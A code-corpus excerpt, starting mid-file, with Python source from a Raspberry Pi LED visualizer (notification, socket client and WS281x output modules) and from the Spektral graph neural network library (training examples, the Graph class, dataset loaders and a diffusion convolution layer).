self._cancel_token = False
print("NotificationService component started.")
while not self._cancel_token:
# 1. Check Webserver
# 2. Check Output
# 3. Check Effects
sleep(0.5)
def stop(self):
self._cancel_token = True
def config_refresh(self):
# Summary
# 1. Pause every process that have to refresh the config.
# 2. Send the refresh command
# 3. Wait for all to finish the process.
# 4. Continue the processes.
# 1. Pause every process that have to refresh the config.
self._notification_queue_effects_in.put(NotificationEnum.process_pause)
# 2. Send the refresh command
self._notification_queue_effects_in.put(NotificationEnum.config_refresh)
# 3. Wait for all to finish the process.
# Only the effects process is coordinated through these queues; waiting
# on an output flag here as well would never terminate, since nothing
# in this loop can set it.
effect_ready = False
while not effect_ready:
# Check the notification queue of effects, if it is ready to continue
if not self._notification_queue_effects_out.empty():
current_effects_out = self._notification_queue_effects_out.get()
if current_effects_out is NotificationEnum.config_refresh_finished:
effect_ready = True
sleep(0.1) # avoid spinning at 100 percent CPU while waiting
# 4. Continue the processes.
self._notification_queue_effects_in.put(NotificationEnum.process_continue)
```
#### File: client/libs/server_service.py
```python
import socket, pickle, struct
from time import sleep
import time
from subprocess import check_output
import sys
class ServerService:
def start(self, config_lock, notification_queue_in, notification_queue_out, server_queue, server_queue_lock):
self._config_lock = config_lock
self._notification_queue_in = notification_queue_in
self._notification_queue_out = notification_queue_out
self._server_queue = server_queue
self._server_queue_lock = server_queue_lock
ten_seconds_counter = time.time()
start_time = time.time()
self._frame_counter = 0
while True:
print("--- Try to connect with the server. ---")
try:
hostIP = socket.gethostbyname("raspi-led")
port = 65432
print("Connect to " + str(hostIP) + ":" + str(port))
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((hostIP, port))
while True:
output_array = None
self._server_queue_lock.acquire()
if not self._server_queue.empty():
output_array = self._server_queue.get()
self._server_queue_lock.release()
if output_array is None:
#print("Server Service | Output array is empty")
continue
self.sendArray(sock, output_array)
end_time = time.time()
if time.time() - ten_seconds_counter > 10:
ten_seconds_counter = time.time()
time_dif = end_time - start_time
fps = 1 / time_dif
print("Server Service | FPS: " + str(fps))
start_time = time.time()
except TimeoutError as ex:
print("Connection timed out.")
except Exception:
print("Unexpected error in server service:" + str(sys.exc_info()[0]))
sleep(10)
def sendArray(self, sock, array):
# Send Array Data
sendData = pickle.dumps(array)
self.send_msg(sock, sendData)
def send_msg(self, sock, msg):
# Prefix each message with a 4-byte length (network byte order)
msg = struct.pack('>I', len(msg)) + msg
sock.sendall(msg)
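# Illustrative counterpart (assumed; the server side is not part of this
# file): a receiver for the 4-byte length-prefixed frames that send_msg()
# produces.
def recv_msg(self, sock):
# Read the 4-byte big-endian length header, then exactly that many bytes
raw_len = self.recvall(sock, 4)
if raw_len is None:
return None
msg_len = struct.unpack('>I', raw_len)[0]
return self.recvall(sock, msg_len)
def recvall(self, sock, n):
# Keep reading until n bytes have arrived or the peer closes the socket
data = b''
while len(data) < n:
packet = sock.recv(n - len(data))
if not packet:
return None
data += packet
return data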
```
#### File: server/libs/output.py
```python
import numpy as np
from numpy import asarray
from libs.config_service import ConfigService # pylint: disable=E0611, E0401
from libs.notification_enum import NotificationEnum # pylint: disable=E0611, E0401
from ctypes import c_uint8
import time
from time import sleep
import cProfile
import pprint
import array
class Output:
def manual_init(self):
import _rpi_ws281x as ws # pylint: disable=import-error
device_config = self._config["device_config"]
# LED strip configuration:
self._led_count = int(device_config["LED_Count"]) # Number of LED pixels.
self._led_pin = int(device_config["LED_Pin"]) # GPIO pin connected to the pixels (18 uses PWM!).
self._led_freq_hz = int(device_config["LED_Freq_Hz"]) # LED signal frequency in hertz (usually 800khz)
self._led_dma = int(device_config["LED_Dma"]) # DMA channel to use for generating signal (try 10)
self._led_brightness = int(device_config["LED_Brightness"]) # Set to 0 for darkest and 100 for brightest
self._led_invert = int(device_config["LED_Invert"]) # True to invert the signal (when using NPN transistor level shift)
self._led_channel = int(device_config["LED_Channel"]) # set to '1' for GPIOs 13, 19, 41, 45 or 53
self._led_brightness_translated = int(255 * (self._led_brightness / 100))
#self._led_brightness_translated = 255
print("LED Brightness: " + str(self._led_brightness))
print("LED Brightness Translated: " + str(self._led_brightness_translated))
self._leds = ws.new_ws2811_t()
self.channel = ws.ws2811_channel_get(self._leds, 0)
ws.ws2811_channel_t_count_set(self.channel, self._led_count)
ws.ws2811_channel_t_gpionum_set(self.channel, self._led_pin)
ws.ws2811_channel_t_invert_set(self.channel, self._led_invert)
ws.ws2811_channel_t_brightness_set(self.channel, self._led_brightness_translated)
ws.ws2811_t_freq_set(self._leds, self._led_freq_hz)
ws.ws2811_t_dmanum_set(self._leds, self._led_dma)
# Initialize library with LED configuration.
resp = ws.ws2811_init(self._leds)
if resp != ws.WS2811_SUCCESS:
message = ws.ws2811_get_return_t_str(resp)
raise RuntimeError('ws2811_init failed with code {0} ({1})'.format(resp, message))
def start(self, config_lock, notification_queue_in, notification_queue_out, output_queue, output_queue_lock):
print("Starting Output component..")
self._config_lock = config_lock
self._output_queue = output_queue
self._output_queue_lock = output_queue_lock
self._notification_queue_in = notification_queue_in
self._notification_queue_out = notification_queue_out
self.ten_seconds_counter = time.time()
self.sec_ten_seconds_counter = time.time()
self.start_time = time.time()
# Initial config load.
self._config = ConfigService.instance(self._config_lock).config
#Init FPS Limiter
self.fps_limiter_start = time.time()
self.max_fps = self._config["audio_config"]["FPS"] + 10
self.min_waiting_time = 1 / self.max_fps
# Init all necessary components
self.manual_init()
self._skip_output = False
self._cancel_token = False
print("Output component started.")
while not self._cancel_token:
self.output_routine()
def output_routine(self):
# Limit the FPS to reduce lag caused by 100 percent CPU usage
self.fps_limiter()
# Check the notification queue
if not self._notification_queue_in.empty():
self._current_notification_in = self._notification_queue_in.get()
if hasattr(self, "_current_notification_in"):
if self._current_notification_in is NotificationEnum.config_refresh:
self.refresh()
elif self._current_notification_in is NotificationEnum.process_continue:
self._skip_output = False
elif self._current_notification_in is NotificationEnum.process_pause:
self._skip_output = True
elif self._current_notification_in is NotificationEnum.process_stop:
self.stop()
# Reset the current notification so it is handled only once.
self._current_notification_in = None
# Skip the output sequence, for example to "pause" the process.
if self._skip_output:
if not self._output_queue.empty():
skip_output_queue = self._output_queue.get()
return
# If a frame is waiting in the queue, fetch and display it.
if not self._output_queue.empty():
current_output_array = self._output_queue.get()
self.show(current_output_array)
#cProfile.runctx('self.show(current_output_array)', globals(), locals())
self.end_time = time.time()
if time.time() - self.ten_seconds_counter > 10:
self.ten_seconds_counter = time.time()
self.time_dif = self.end_time - self.start_time
self.fps = 1 / self.time_dif
print("Output Service | FPS: " + str(self.fps))
self.start_time = time.time()
def stop(self):
self._cancel_token = True
self.clear()
def refresh(self):
print("Refresh Output...")
# Refresh the config
ConfigService.instance(self._config_lock).load_config()
self._config = ConfigService.instance(self._config_lock).config
# Init the led components with the new config again
self.manual_init()
# Notify the master component that I'm finished.
self._notification_queue_out.put(NotificationEnum.config_refresh_finished)
print("Output refreshed.")
def show(self, output_array):
import _rpi_ws281x as ws # pylint: disable=import-error
# Typecast the array to int
output_array = output_array.clip(0, 255).astype(int)
# Pack each pixel into a single colour word in GRB order
g = np.left_shift(output_array[1][:].astype(int), 16) # pylint: disable=assignment-from-no-return
r = np.left_shift(output_array[0][:].astype(int), 8) # pylint: disable=assignment-from-no-return
b = output_array[2][:].astype(int)
rgb = np.bitwise_or(np.bitwise_or(r, g), b).astype(int)
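# Example: pure red (255, 0, 0) packs to 0x00FF00 - green occupies
# bits 16-23, red bits 8-15 and blue bits 0-7 (WS281x chips expect GRB).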
# You can only use ws2811_leds_set with the custom version.
#ws.ws2811_leds_set(self.channel, rgb)
for i in range(self._led_count):
ws.ws2811_led_set(self.channel, i, rgb[i].item())
resp = ws.ws2811_render(self._leds)
if resp != ws.WS2811_SUCCESS:
message = ws.ws2811_get_return_t_str(resp)
raise RuntimeError('ws2811_render failed with code {0} ({1})'.format(resp, message))
def clear(self):
# Create an array of zeros, one column per LED
pixels = np.zeros((3, self._led_count), dtype=int)
self.show(pixels)
def fps_limiter(self):
self.fps_limiter_end = time.time()
time_between_last_cycle = self.fps_limiter_end - self.fps_limiter_start
if time_between_last_cycle < self.min_waiting_time:
sleep(self.min_waiting_time - time_between_last_cycle)
self.fps_limiter_start = time.time()
def start_dummy(self, config_lock, notification_queue_in, notification_queue_out, output_queue, output_queue_lock):
print("Starting Output component..")
self._config_lock = config_lock
self._output_queue = output_queue
self._output_queue_lock = output_queue_lock
self._notification_queue_in = notification_queue_in
self._notification_queue_out = notification_queue_out
self._skip_output = False
self._cancel_token = False
print("Output component started.")
while not self._cancel_token:
sleep(0.2)
# Check the notification queue
if not self._notification_queue_in.empty():
self._current_notification_in = self._notification_queue_in.get()
if hasattr(self, "_current_notification_in"):
if self._current_notification_in is NotificationEnum.config_refresh:
self.refresh_dummy()
elif self._current_notification_in is NotificationEnum.process_continue:
self._skip_output = False
elif self._current_notification_in is NotificationEnum.process_pause:
self._skip_output = True
elif self._current_notification_in is NotificationEnum.process_stop:
print("dummy stop")
break
# Reset the current notification so it is handled only once.
self._current_notification_in = None
# Skip the output sequence, for example to "pause" the process.
if self._skip_output:
self._output_queue_lock.acquire()
if not self._output_queue.empty():
self._output_queue.get()
self._output_queue_lock.release()
continue
# Drain one frame from the queue if one is waiting (the dummy output discards it).
self._output_queue_lock.acquire()
if not self._output_queue.empty():
self._output_queue.get()
self._output_queue_lock.release()
def refresh_dummy(self):
print("Refresh Output...")
# Refresh the config
ConfigService.instance(self._config_lock).load_config()
self._config = ConfigService.instance(self._config_lock).config
# Notify the master component that I'm finished.
self._notification_queue_out.put(NotificationEnum.config_refresh_finished)
print("Output refreshed.")
``` |
{
"source": "JonaBecher/spektral",
"score": 3
} |
#### File: examples/graph_prediction/qm9_ecc_batch.py
```python
import numpy as np
from tensorflow.keras.layers import Dense
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
from spektral.data import BatchLoader
from spektral.datasets import QM9
from spektral.layers import ECCConv, GlobalSumPool, GraphMasking
################################################################################
# Config
################################################################################
learning_rate = 1e-3 # Learning rate
epochs = 10 # Number of training epochs
batch_size = 32 # Batch size
################################################################################
# Load data
################################################################################
dataset = QM9(amount=1000) # Set amount=None to train on whole dataset
# Parameters
F = dataset.n_node_features # Dimension of node features
S = dataset.n_edge_features # Dimension of edge features
n_out = dataset.n_labels # Dimension of the target
# Train/test split
idxs = np.random.permutation(len(dataset))
split = int(0.9 * len(dataset))
idx_tr, idx_te = np.split(idxs, [split])
dataset_tr, dataset_te = dataset[idx_tr], dataset[idx_te]
################################################################################
# Build model
################################################################################
class Net(Model):
def __init__(self):
super().__init__()
self.masking = GraphMasking()
self.conv1 = ECCConv(32, activation="relu")
self.conv2 = ECCConv(32, activation="relu")
self.global_pool = GlobalSumPool()
self.dense = Dense(n_out)
def call(self, inputs):
x, a, e = inputs
x = self.masking(x)
x = self.conv1([x, a, e])
x = self.conv2([x, a, e])
output = self.global_pool(x)
output = self.dense(output)
return output
model = Net()
optimizer = Adam(learning_rate)
model.compile(optimizer=optimizer, loss="mse")
################################################################################
# Fit model
################################################################################
loader_tr = BatchLoader(dataset_tr, batch_size=batch_size, mask=True)
model.fit(loader_tr.load(), steps_per_epoch=loader_tr.steps_per_epoch, epochs=epochs)
################################################################################
# Evaluate model
################################################################################
print("Testing model")
loader_te = BatchLoader(dataset_te, batch_size=batch_size, mask=True)
loss = model.evaluate(loader_te.load(), steps=loader_te.steps_per_epoch)
print("Done. Test loss: {}".format(loss))
```
#### File: examples/graph_prediction/tud_gin.py
```python
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Dense, Dropout
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.metrics import categorical_accuracy
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
from spektral.data import DisjointLoader
from spektral.datasets import TUDataset
from spektral.layers import GINConv, GlobalAvgPool
################################################################################
# Config
################################################################################
learning_rate = 1e-3 # Learning rate
channels = 128 # Hidden units
layers = 3 # GIN layers
epochs = 10 # Number of training epochs
batch_size = 32 # Batch size
################################################################################
# Load data
################################################################################
dataset = TUDataset("PROTEINS", clean=True)
# Parameters
F = dataset.n_node_features # Dimension of node features
n_out = dataset.n_labels # Dimension of the target
# Train/test split
idxs = np.random.permutation(len(dataset))
split = int(0.9 * len(dataset))
idx_tr, idx_te = np.split(idxs, [split])
dataset_tr, dataset_te = dataset[idx_tr], dataset[idx_te]
loader_tr = DisjointLoader(dataset_tr, batch_size=batch_size, epochs=epochs)
loader_te = DisjointLoader(dataset_te, batch_size=batch_size, epochs=1)
################################################################################
# Build model
################################################################################
class GIN0(Model):
def __init__(self, channels, n_layers):
super().__init__()
self.conv1 = GINConv(channels, epsilon=0, mlp_hidden=[channels, channels])
self.convs = []
for _ in range(1, n_layers):
self.convs.append(
GINConv(channels, epsilon=0, mlp_hidden=[channels, channels])
)
self.pool = GlobalAvgPool()
self.dense1 = Dense(channels, activation="relu")
self.dropout = Dropout(0.5)
self.dense2 = Dense(n_out, activation="softmax")
def call(self, inputs):
x, a, i = inputs
x = self.conv1([x, a])
for conv in self.convs:
x = conv([x, a])
x = self.pool([x, i])
x = self.dense1(x)
x = self.dropout(x)
return self.dense2(x)
# Build model
model = GIN0(channels, layers)
optimizer = Adam(learning_rate)
loss_fn = CategoricalCrossentropy()
################################################################################
# Fit model
################################################################################
@tf.function(input_signature=loader_tr.tf_signature(), experimental_relax_shapes=True)
def train_step(inputs, target):
with tf.GradientTape() as tape:
predictions = model(inputs, training=True)
loss = loss_fn(target, predictions) + sum(model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
acc = tf.reduce_mean(categorical_accuracy(target, predictions))
return loss, acc
epoch = step = 0
results = []
for batch in loader_tr:
step += 1
loss, acc = train_step(*batch)
results.append((loss, acc))
if step == loader_tr.steps_per_epoch:
step = 0
epoch += 1
print("Ep. {} - Loss: {}. Acc: {}".format(epoch, *np.mean(results, 0)))
results = []
################################################################################
# Evaluate model
################################################################################
results = []
for batch in loader_te:
inputs, target = batch
predictions = model(inputs, training=False)
results.append(
(
loss_fn(target, predictions),
tf.reduce_mean(categorical_accuracy(target, predictions)),
)
)
print("Done. Test loss: {}. Test acc: {}".format(*np.mean(results, 0)))
```
#### File: examples/node_prediction/citation_cheby.py
```python
import numpy as np
from tensorflow.keras.callbacks import EarlyStopping
from tensorflow.keras.layers import Dropout, Input
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
from tensorflow.keras.regularizers import l2
from spektral.data.loaders import SingleLoader
from spektral.datasets.citation import Citation
from spektral.layers import ChebConv
from spektral.transforms import LayerPreprocess
# Load data
dataset = Citation("cora", transforms=[LayerPreprocess(ChebConv)])
# We convert the binary masks to sample weights so that we can compute the
# average loss over the nodes (following original implementation by
# Kipf & Welling)
def mask_to_weights(mask):
return mask / np.count_nonzero(mask)
weights_tr, weights_va, weights_te = (
mask_to_weights(mask)
for mask in (dataset.mask_tr, dataset.mask_va, dataset.mask_te)
)
# Parameters
channels = 16 # Number of channels in the first layer
K = 2 # Max degree of the Chebyshev polynomials
dropout = 0.5 # Dropout rate for the features
l2_reg = 2.5e-4 # L2 regularization rate
learning_rate = 1e-2 # Learning rate
epochs = 200 # Number of training epochs
patience = 10 # Patience for early stopping
a_dtype = dataset[0].a.dtype # Only needed for TF 2.1
N = dataset.n_nodes # Number of nodes in the graph
F = dataset.n_node_features # Original size of node features
n_out = dataset.n_labels # Number of classes
# Model definition
x_in = Input(shape=(F,))
a_in = Input((N,), sparse=True, dtype=a_dtype)
do_1 = Dropout(dropout)(x_in)
gc_1 = ChebConv(
channels, K=K, activation="relu", kernel_regularizer=l2(l2_reg), use_bias=False
)([do_1, a_in])
do_2 = Dropout(dropout)(gc_1)
gc_2 = ChebConv(n_out, K=K, activation="softmax", use_bias=False)([do_2, a_in])
# Build model
model = Model(inputs=[x_in, a_in], outputs=gc_2)
optimizer = Adam(learning_rate=learning_rate)
model.compile(
optimizer=optimizer,
loss=CategoricalCrossentropy(reduction="sum"), # To compute mean
weighted_metrics=["acc"],
)
model.summary()
# Train model
loader_tr = SingleLoader(dataset, sample_weights=weights_tr)
loader_va = SingleLoader(dataset, sample_weights=weights_va)
model.fit(
loader_tr.load(),
steps_per_epoch=loader_tr.steps_per_epoch,
validation_data=loader_va.load(),
validation_steps=loader_va.steps_per_epoch,
epochs=epochs,
callbacks=[EarlyStopping(patience=patience, restore_best_weights=True)],
)
# Evaluate model
print("Evaluating model.")
loader_te = SingleLoader(dataset, sample_weights=weights_te)
eval_results = model.evaluate(loader_te.load(), steps=loader_te.steps_per_epoch)
print("Done.\n" "Test loss: {}\n" "Test accuracy: {}".format(*eval_results))
```
#### File: examples/node_prediction/citation_gcn_custom.py
```python
import tensorflow as tf
from tensorflow.keras.losses import CategoricalCrossentropy
from tensorflow.keras.optimizers import Adam
from spektral.datasets.citation import Cora
from spektral.layers import GCNConv
from spektral.models.gcn import GCN
from spektral.transforms import AdjToSpTensor, LayerPreprocess
from spektral.utils import tic, toc
tf.random.set_seed(seed=0) # make weight initialization reproducible
# Load data
dataset = Cora(normalize_x=True, transforms=[LayerPreprocess(GCNConv), AdjToSpTensor()])
graph = dataset[0]
x, a, y = graph.x, graph.a, graph.y
mask_tr, mask_va, mask_te = dataset.mask_tr, dataset.mask_va, dataset.mask_te
model = GCN(n_labels=dataset.n_labels, n_input_channels=dataset.n_node_features)
optimizer = Adam(learning_rate=1e-2)
loss_fn = CategoricalCrossentropy()
# Training step
@tf.function
def train():
with tf.GradientTape() as tape:
predictions = model([x, a], training=True)
loss = loss_fn(y[mask_tr], predictions[mask_tr])
loss += sum(model.losses)
gradients = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(gradients, model.trainable_variables))
return loss
# Time the execution of 200 epochs of training
train() # Warm up to ignore tracing times when timing
tic()
for epoch in range(1, 201):
loss = train()
toc("Spektral - GCN (200 epochs)")
print(f"Final loss = {loss}")
```
#### File: spektral/data/graph.py
```python
import warnings
import numpy as np
import scipy.sparse as sp
class Graph:
"""
A container to represent a graph. The data associated with the Graph is
stored in its attributes:
- `x`, for the node features;
- `a`, for the adjacency matrix;
- `e`, for the edge attributes;
- `y`, for the node or graph labels;
All of these default to `None` if you don't specify them in the constructor.
If you want to read all non-None attributes at once, you can call the
`numpy()` method, which will return all data in a tuple (with the order
defined above).
Graphs also have the following attributes that are computed automatically
from the data:
- `n_nodes`: number of nodes;
- `n_edges`: number of edges;
- `n_node_features`: size of the node features, if available;
- `n_edge_features`: size of the edge features, if available;
- `n_labels`: size of the labels, if available;
Any additional `kwargs` passed to the constructor will be automatically
assigned as instance attributes of the graph.
Data can be stored in Numpy arrays or Scipy sparse matrices, and labels can
also be scalars.
Spektral usually assumes that the different data matrices have specific
shapes, although this is not strictly enforced to allow more flexibility.
In general, node attributes should have shape `(n_nodes, n_node_features)` and the adjacency
matrix should have shape `(n_nodes, n_nodes)`.
Edge attributes can be stored in a dense format as arrays of shape
`(n_nodes, n_nodes, n_edge_features)` or in a sparse format as arrays of shape `(n_edges, n_edge_features)`
(so that you don't have to store all the zeros for missing edges). Most
components of Spektral will know how to deal with both situations
automatically.
Labels can refer to the entire graph (shape `(n_labels, )`) or to each
individual node (shape `(n_nodes, n_labels)`).
**Arguments**
- `x`: np.array, the node features (shape `(n_nodes, n_node_features)`);
- `a`: np.array or scipy.sparse matrix, the adjacency matrix (shape `(n_nodes, n_nodes)`);
- `e`: np.array, the edge features (shape `(n_nodes, n_nodes, n_edge_features)` or `(n_edges, n_edge_features)`);
- `y`: np.array, the node or graph labels (shape `(n_nodes, n_labels)` or `(n_labels, )`);
"""
def __init__(self, x=None, a=None, e=None, y=None, **kwargs):
if x is not None:
if not isinstance(x, np.ndarray):
raise ValueError(f"Unsupported type {type(x)} for x")
if len(x.shape) == 1:
x = x[:, None]
warnings.warn(f"x was automatically reshaped to {x.shape}")
if len(x.shape) != 2:
raise ValueError(
f"x must have shape (n_nodes, n_node_features), got "
f"rank {len(x.shape)}"
)
if a is not None:
if not (isinstance(a, np.ndarray) or sp.isspmatrix(a)):
raise ValueError(f"Unsupported type {type(a)} for a")
if len(a.shape) != 2:
raise ValueError(
f"a must have shape (n_nodes, n_nodes), got rank {len(a.shape)}"
)
if e is not None:
if not isinstance(e, np.ndarray):
raise ValueError(f"Unsupported type {type(e)} for e")
if len(e.shape) not in (2, 3):
raise ValueError(
f"e must have shape (n_edges, n_edge_features) or "
f"(n_nodes, n_nodes, n_edge_features), got rank {len(e.shape)}"
)
self.x = x
self.a = a
self.e = e
self.y = y
# Read extra kwargs
for k, v in kwargs.items():
self[k] = v
def numpy(self):
return tuple(ret for ret in [self.x, self.a, self.e, self.y] if ret is not None)
def get(self, *keys):
return tuple(self[key] for key in keys if self[key] is not None)
def __setitem__(self, key, value):
setattr(self, key, value)
def __getitem__(self, key):
return getattr(self, key, None)
def __contains__(self, key):
return key in self.keys
def __repr__(self):
return "Graph(n_nodes={}, n_node_features={}, n_edge_features={}, n_labels={})".format(
self.n_nodes, self.n_node_features, self.n_edge_features, self.n_labels
)
@property
def n_nodes(self):
if self.x is not None:
return self.x.shape[-2]
elif self.a is not None:
return self.a.shape[-1]
else:
return None
@property
def n_edges(self):
if sp.issparse(self.a):
return self.a.nnz
elif isinstance(self.a, np.ndarray):
return np.count_nonzero(self.a)
else:
return None
@property
def n_node_features(self):
if self.x is not None:
return self.x.shape[-1]
else:
return None
@property
def n_edge_features(self):
if self.e is not None:
return self.e.shape[-1]
else:
return None
@property
def n_labels(self):
if self.y is not None:
shp = np.shape(self.y)
return 1 if len(shp) == 0 else shp[-1]
else:
return None
@property
def keys(self):
keys = [
key
for key in self.__dict__.keys()
if self[key] is not None and not key.startswith("__")
]
return keys
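# Illustrative usage sketch (not part of the original module; the toy arrays
# below are assumptions chosen only for the example):
#
#   x = np.random.rand(4, 3)        # 4 nodes, 3 features each
#   a = np.eye(4)                   # dense adjacency matrix
#   y = np.array([1.0])             # one graph-level label
#   g = Graph(x=x, a=a, y=y)
#   print(g)                        # Graph(n_nodes=4, n_node_features=3, ...)
#   x, a, y = g.numpy()             # all non-None attributes, in order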
```
#### File: spektral/datasets/qm9.py
```python
import os
import os.path as osp
import numpy as np
from joblib import Parallel, delayed
from tensorflow.keras.utils import get_file
from tqdm import tqdm
from spektral.data import Dataset, Graph
from spektral.utils import label_to_one_hot, sparse
from spektral.utils.io import load_csv, load_sdf
ATOM_TYPES = [1, 6, 7, 8, 9]
BOND_TYPES = [1, 2, 3, 4]
class QM9(Dataset):
"""
The QM9 chemical data set of small molecules.
In this dataset, nodes represent atoms and edges represent chemical bonds.
There are 5 possible atom types (H, C, N, O, F) and 4 bond types (single,
double, triple, aromatic).
Node features represent the chemical properties of each atom and include:
- The atomic number, one-hot encoded;
- The atom's position in the X, Y, and Z dimensions;
- The atomic charge;
- The mass difference from the monoisotope;
The edge features represent the type of chemical bond between two atoms,
one-hot encoded.
    Each graph has a 19-dimensional label for regression.
**Arguments**
- `amount`: int, load this many molecules instead of the full dataset
(useful for debugging).
- `n_jobs`: number of CPU cores to use for reading the data (-1, to use all
available cores).
"""
url = "https://deepchemdata.s3-us-west-1.amazonaws.com/datasets/gdb9.tar.gz"
def __init__(self, amount=None, n_jobs=1, **kwargs):
self.amount = amount
self.n_jobs = n_jobs
super().__init__(**kwargs)
def download(self):
get_file(
"qm9.tar.gz",
self.url,
extract=True,
cache_dir=self.path,
cache_subdir=self.path,
)
os.remove(osp.join(self.path, "qm9.tar.gz"))
def read(self):
print("Loading QM9 dataset.")
sdf_file = osp.join(self.path, "gdb9.sdf")
data = load_sdf(sdf_file, amount=self.amount) # Internal SDF format
def read_mol(mol):
x = np.array([atom_to_feature(atom) for atom in mol["atoms"]])
a, e = mol_to_adj(mol)
return x, a, e
data = Parallel(n_jobs=self.n_jobs)(
delayed(read_mol)(mol) for mol in tqdm(data, ncols=80)
)
x_list, a_list, e_list = list(zip(*data))
# Load labels
labels_file = osp.join(self.path, "gdb9.sdf.csv")
labels = load_csv(labels_file)
labels = labels.set_index("mol_id").values
if self.amount is not None:
labels = labels[: self.amount]
return [
Graph(x=x, a=a, e=e, y=y)
for x, a, e, y in zip(x_list, a_list, e_list, labels)
]
def atom_to_feature(atom):
atomic_num = label_to_one_hot(atom["atomic_num"], ATOM_TYPES)
coords = atom["coords"]
charge = atom["charge"]
iso = atom["iso"]
return np.concatenate((atomic_num, coords, [charge, iso]), -1)
def mol_to_adj(mol):
row, col, edge_features = [], [], []
for bond in mol["bonds"]:
start, end = bond["start_atom"], bond["end_atom"]
row += [start, end]
col += [end, start]
edge_features += [bond["type"]] * 2
a, e = sparse.edge_index_to_matrix(
edge_index=np.array((row, col)).T,
edge_weight=np.ones_like(row),
edge_features=label_to_one_hot(edge_features, BOND_TYPES),
)
return a, e
```
#### File: spektral/datasets/utils.py
```python
import os
import os.path as osp
import zipfile
import requests
from tqdm import tqdm
_dataset_folder = "~/.spektral/datasets"
_config_path = osp.expanduser("~/.spektral/config.json")
if osp.isfile(_config_path):
import json
with open(_config_path) as fh:
_config = json.load(fh)
_dataset_folder = _config.get("dataset_folder", _dataset_folder)
DATASET_FOLDER = osp.expanduser(_dataset_folder)
def download_file(url, datadir, fname, progress=True, extract=True):
with requests.get(url, stream=progress) as r:
r.raise_for_status()
os.makedirs(datadir, exist_ok=True)
outfile = osp.join(datadir, fname)
with open(outfile, "wb") as of:
if progress:
pbar = tqdm(
total=int(r.headers["Content-Length"]),
ncols=80,
unit="B",
unit_scale=True,
unit_divisor=1024,
)
for chunk in r.iter_content(chunk_size=8192):
if chunk is not None:
of.write(chunk)
pbar.update(len(chunk))
else:
of.write(r.content)
if extract and fname.endswith(".zip"):
with zipfile.ZipFile(outfile, "r") as of:
of.extractall(datadir)
os.remove(outfile)
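# Illustrative call (hypothetical URL and file name, not part of the original
# file):
#
#   download_file("https://example.com/data.zip", DATASET_FOLDER, "data.zip",
#                 progress=True, extract=True)
#   # Streams the archive with a tqdm progress bar, unzips it in place, and
#   # removes the downloaded .zip afterwards.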
```
#### File: layers/convolutional/diffusion_conv.py
```python
import tensorflow as tf
import tensorflow.keras.layers as layers
from spektral.layers.convolutional.conv import Conv
from spektral.utils import gcn_filter
class DiffuseFeatures(layers.Layer):
r"""
Utility layer calculating a single channel of the diffusional convolution.
The procedure is based on [https://arxiv.org/abs/1707.01926](https://arxiv.org/abs/1707.01926)
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Normalized adjacency or attention coef. matrix \(\hat \A \) of shape
`([batch], n_nodes, n_nodes)`; Use DiffusionConvolution.preprocess to normalize.
**Output**
- Node features with the same shape as the input, but with the last
dimension changed to \(1\).
**Arguments**
- `num_diffusion_steps`: How many diffusion steps to consider. \(K\) in paper.
- `kernel_initializer`: initializer for the weights;
- `kernel_regularizer`: regularization applied to the kernel vectors;
- `kernel_constraint`: constraint applied to the kernel vectors;
"""
def __init__(
self,
num_diffusion_steps,
kernel_initializer,
kernel_regularizer,
kernel_constraint,
**kwargs
):
super().__init__(**kwargs)
self.K = num_diffusion_steps
self.kernel_initializer = kernel_initializer
self.kernel_regularizer = kernel_regularizer
self.kernel_constraint = kernel_constraint
def build(self, input_shape):
# Initializing the kernel vector (R^K) (theta in paper)
self.kernel = self.add_weight(
shape=(self.K,),
name="kernel",
initializer=self.kernel_initializer,
regularizer=self.kernel_regularizer,
constraint=self.kernel_constraint,
)
def call(self, inputs):
x, a = inputs
# Calculate diffusion matrix: sum kernel_k * Attention_t^k
        # tf.math.polyval needs a list of tensors as the coefficients, so we
        # unstack the kernel
diffusion_matrix = tf.math.polyval(tf.unstack(self.kernel), a)
# Apply it to X to get a matrix C = [C_1, ..., C_F] (n_nodes x n_node_features)
# of diffused features
diffused_features = tf.matmul(diffusion_matrix, x)
# Now we add all diffused features (columns of the above matrix)
        # and apply a non-linearity to obtain H:,q (eq. 3 in paper)
H = tf.math.reduce_sum(diffused_features, axis=-1)
# H has shape ([batch], n_nodes) but as it is the sum of columns
# we reshape it to ([batch], n_nodes, 1)
return tf.expand_dims(H, -1)
class DiffusionConv(Conv):
r"""
A diffusion convolution operator from the paper
> [Diffusion Convolutional Recurrent Neural Network: Data-Driven Traffic
Forecasting](https://arxiv.org/abs/1707.01926)<br>
> <NAME> et al.
**Mode**: single, disjoint, mixed, batch.
**This layer expects a dense adjacency matrix.**
Given a number of diffusion steps \(K\) and a row-normalized adjacency
matrix \(\hat \A \), this layer calculates the \(q\)-th channel as:
$$
\mathbf{X}_{~:,~q}' = \sigma\left( \sum_{f=1}^{F} \left( \sum_{k=0}^{K-1}
\theta_k {\hat \A}^k \right) \X_{~:,~f} \right)
$$
**Input**
- Node features of shape `([batch], n_nodes, n_node_features)`;
- Normalized adjacency or attention coef. matrix \(\hat \A \) of shape
`([batch], n_nodes, n_nodes)`; Use `DiffusionConvolution.preprocess` to normalize.
**Output**
- Node features with the same shape as the input, but with the last
dimension changed to `channels`.
**Arguments**
- `channels`: number of output channels;
- `K`: number of diffusion steps.
- `activation`: activation function \(\sigma\); (\(\tanh\) by default)
- `kernel_initializer`: initializer for the weights;
- `kernel_regularizer`: regularization applied to the weights;
- `kernel_constraint`: constraint applied to the weights;
"""
def __init__(
self,
channels,
K=6,
activation="tanh",
kernel_initializer="glorot_uniform",
kernel_regularizer=None,
kernel_constraint=None,
**kwargs
):
super().__init__(
activation=activation,
kernel_initializer=kernel_initializer,
kernel_regularizer=kernel_regularizer,
kernel_constraint=kernel_constraint,
**kwargs
)
self.channels = channels
self.K = K + 1
def build(self, input_shape):
self.filters = [
DiffuseFeatures(
